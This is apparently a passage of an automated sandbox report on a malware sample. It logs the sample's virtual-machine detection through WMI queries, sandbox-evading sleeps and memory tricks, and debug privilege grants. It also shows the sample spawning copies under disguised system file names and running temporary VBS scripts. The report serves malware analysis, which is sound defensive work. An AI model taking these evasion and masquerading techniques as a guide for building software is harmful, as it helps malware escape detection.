Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\System.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Memory allocated: EA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Memory allocated: 1AA20000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Memory allocated: 1120000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Memory allocated: 1AF80000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Memory allocated: 15C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Memory allocated: 1AF90000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Memory allocated: 1480000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Memory allocated: 1B230000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Memory allocated: 1390000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Memory allocated: 1AE60000 memory reserve | memory write watch
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Memory allocated: 860000 memory reserve | memory write watch
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Memory allocated: 1A570000 memory reserve | memory write watch
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Memory allocated: 8B0000 memory reserve | memory write watch
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Memory allocated: 1A780000 memory reserve | memory write watch
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Memory allocated: 29A0000 memory reserve | memory write watch
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Memory allocated: 1AB90000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Memory allocated: 11D0000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Memory allocated: 1AF90000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Memory allocated: F90000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Memory allocated: 1AE90000 memory reserve | memory write watch
Source: C:\Recovery\System.exe Memory allocated: A70000 memory reserve | memory write watch
Source: C:\Recovery\System.exe Memory allocated: 1A7F0000 memory reserve | memory write watch
Source: C:\Recovery\System.exe Memory allocated: 12D0000 memory reserve | memory write watch
Source: C:\Recovery\System.exe Memory allocated: 1AC70000 memory reserve | memory write watch
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Memory allocated: A20000 memory reserve | memory write watch
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Memory allocated: 1A4C0000 memory reserve | memory write watch
Source: C:\Recovery\System.exe Memory allocated: 1340000 memory reserve | memory write watch
Source: C:\Recovery\System.exe Memory allocated: 1AE30000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 600000
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 599883
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 599767
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 599651
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 599532
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 599412
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\System.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\System.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\System.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Window / User API: threadDelayed 1311 Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Window / User API: threadDelayed 920 Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Window / User API: threadDelayed 364 Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Window / User API: threadDelayed 361 Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Window / User API: threadDelayed 560 Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Window / User API: threadDelayed 360
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Window / User API: threadDelayed 1481
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Window / User API: threadDelayed 916
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Window / User API: threadDelayed 364
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Window / User API: threadDelayed 364
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Window / User API: threadDelayed 361
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Window / User API: threadDelayed 367
Source: C:\Recovery\System.exe Window / User API: threadDelayed 367
Source: C:\Recovery\System.exe Window / User API: threadDelayed 373
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Window / User API: threadDelayed 638
Source: C:\Recovery\System.exe Window / User API: threadDelayed 768
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\4KjLUaW30K.exe TID: 6480 Thread sleep count: 1311 > 30 Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe TID: 6480 Thread sleep count: 920 > 30 Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe TID: 6220 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe TID: 7208 Thread sleep count: 364 > 30 Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe TID: 5252 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe TID: 7468 Thread sleep count: 361 > 30 Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe TID: 7284 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe TID: 7404 Thread sleep count: 560 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe TID: 7288 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe TID: 7548 Thread sleep count: 360 > 30
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe TID: 7472 Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 7364 Thread sleep count: 1481 > 30
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052 Thread sleep time: -600000s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052 Thread sleep time: -599883s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 7356 Thread sleep count: 916 > 30
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052 Thread sleep time: -599767s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052 Thread sleep time: -599651s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052 Thread sleep time: -599532s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8052 Thread sleep time: -599412s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 7812 Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 7340 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe TID: 7568 Thread sleep count: 364 > 30
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe TID: 7452 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe TID: 7624 Thread sleep count: 364 > 30
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe TID: 7492 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe TID: 7856 Thread sleep count: 361 > 30
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe TID: 7628 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe TID: 7964 Thread sleep count: 367 > 30
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe TID: 7688 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\System.exe TID: 7916 Thread sleep count: 367 > 30
Source: C:\Recovery\System.exe TID: 7664 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\System.exe TID: 7908 Thread sleep count: 373 > 30
Source: C:\Recovery\System.exe TID: 7680 Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8136 Thread sleep count: 308 > 30
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8136 Thread sleep count: 638 > 30
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe TID: 8112 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\System.exe TID: 6204 Thread sleep count: 768 > 30
Source: C:\Recovery\System.exe TID: 8176 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\System.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\System.exe File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\System.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 600000
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 599883
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 599767
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 599651
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 599532
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 599412
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\System.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\System.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\System.exe Thread delayed: delay time: 922337203685477
Source: ae22e728c3f23233571eb704564b4445f7960812.exe.28.dr Binary or memory string: jmVMCiGkLa87XZ73uc8
Source: 4KjLUaW30K.exe, 00000000.00000002.2104263831.000000001BD54000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2146148612.000000001B5C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Process token adjusted: Debug
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process token adjusted: Debug
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Process token adjusted: Debug
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Process token adjusted: Debug
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Process token adjusted: Debug
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Process token adjusted: Debug
Source: C:\Recovery\System.exe Process token adjusted: Debug
Source: C:\Recovery\System.exe Process token adjusted: Debug
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe" Jump to behavior
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs"
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs"
